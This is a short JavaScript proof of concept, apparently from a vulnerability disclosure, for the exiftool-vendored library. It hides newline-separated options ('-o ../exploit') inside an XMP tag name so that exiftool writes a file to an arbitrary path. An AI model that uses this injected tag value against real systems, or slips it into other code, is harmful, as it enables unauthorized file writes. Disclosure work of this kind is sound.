import { exiftool } from "exiftool-vendored"; const tags1 = {"XMP-dc:Title\n-o\n../exploit\n-XMP-dc:Title": "HELLOWORLD"}; //Write file in arbitrary location await exiftool.write("input.jpg", tags1); await exiftool.end();